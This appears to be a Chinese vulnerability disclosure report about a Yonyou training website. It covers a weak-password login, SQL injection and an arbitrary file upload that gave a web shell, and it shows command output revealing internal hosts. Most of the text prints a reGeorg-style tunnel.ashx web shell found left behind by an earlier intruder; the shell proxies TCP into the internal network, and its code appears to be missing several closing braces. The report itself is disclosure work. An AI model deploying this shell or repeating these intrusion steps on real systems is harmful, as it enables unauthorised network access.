从一个弱口令到Getshell用友某站点(可深入内网&已发现入侵者痕迹)

2016年06月27日原文

1.某站点未设置验证码：简单测试后拿到一个账号：http://lexue.yonyou.comtest1/123456

2.发现某处SQL注入登录后对站点进行简单测试，发现存在一处报错注入：

不深入测试，估计还存在注入，请自查!

3.个人资料头像处存在文件任意上传

经过测试后发现，上传正常的菜刀马会出现错误报错，无法正常解析aspx。

上传后，通过抓包可得到完整上传路径：

发现该服务器与内网相通：

[*] 基本信息 [ A:C:D:L: ]

D:PX20150204WebsiteUploadPXSystemdefault> whoami

nt authoritynetwork service

D:PX20150204WebsiteUpLoadPXSystemdefault> nslookup yonyou.com

鏈嶅姟鍣? bg-dc-01.ufsoft.com.cn

Address: 192.168.8.119

鍚嶇О: yonyou.com.com.cn

Address: 202.106.199.34

4.发现入侵痕迹：同目录下发现文件：20151002173504600358.aspx

可确定入侵时间点为：去年10月2号。发现提权神器：

通过查找目录，发现D:PX20150204WebsiteUploadLogtunnel.ashx

using System;

using System.Web;

using System.Net;

using System.Net.Sockets;

public class GenericHandler1 : IHttpHandler, System.Web.SessionState.IRequiresSessionState

{

public void ProcessRequest (HttpContext context) {

try

{

if (context.Request.HttpMethod == "POST")

{

String cmd = context.Request.QueryString.Get("cmd").ToUpper();

if (cmd == "CONNECT")

{

try

{

String target = context.Request.QueryString.Get("target").ToUpper();

int port = int.Parse(context.Request.QueryString.Get("port"));

IPAddress ip = IPAddress.Parse(target);

System.Net.IPEndPoint remoteEP = new IPEndPoint(ip, port);

Socket sender = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);

sender.Connect(remoteEP);

sender.Blocking = false;

context.Session["socket"] = sender;

context.Response.AddHeader("X-STATUS", "OK");

}

catch (Exception ex)

{

context.Response.AddHeader("X-ERROR", ex.Message);

context.Response.AddHeader("X-STATUS", "FAIL");

}

else if (cmd == "DISCONNECT")

{

try

{

Socket s = (Socket)context.Session["socket"];

s.Close();

}

catch (Exception ex)

{

}

context.Session.Abandon();

context.Response.AddHeader("X-STATUS", "OK");

}

else if (cmd == "FORWARD")

{

Socket s = (Socket)context.Session["socket"];

try

{

int buffLen = context.Request.ContentLength;

byte[] buff = new byte[buffLen];

int c = 0;

while ((c = context.Request.InputStream.Read(buff, 0, buff.Length)) > 0)

{

s.Send(buff);

}

context.Response.AddHeader("X-STATUS", "OK");

}

catch (Exception ex)

{

context.Response.AddHeader("X-ERROR", ex.Message);

context.Response.AddHeader("X-STATUS", "FAIL");

}

else if (cmd == "READ")

{

Socket s = (Socket)context.Session["socket"];

try

{

int c = 0;

byte[] readBuff = new byte[512];

try

{

while ((c = s.Receive(readBuff)) > 0)

{

byte[] newBuff = new byte[c];

Array.ConstrainedCopy(readBuff, 0, newBuff, 0, c);

context.Response.BinaryWrite(newBuff);

}

context.Response.AddHeader("X-STATUS", "OK");

}

catch (SocketException soex)

{

context.Response.AddHeader("X-STATUS", "OK");

return;

}

catch (Exception ex)

{

context.Response.AddHeader("X-ERROR", ex.Message);

context.Response.AddHeader("X-STATUS", "FAIL");

}

} else {

context.Response.Write("Georg says, 'All seems fine'");

}

catch (Exception exKak)

{

context.Response.AddHeader("X-ERROR", exKak.Message);

context.Response.AddHeader("X-STATUS", "FAIL");

}

public bool IsReusable {

get {

return false;

}

根据时间点分析：该文件创建于去年10月27日，可能该入侵者，上传文件并隐藏于log目录下，进行内网反弹，可深入进行内网渗透。由于未得到厂商允许，未进行深入渗透!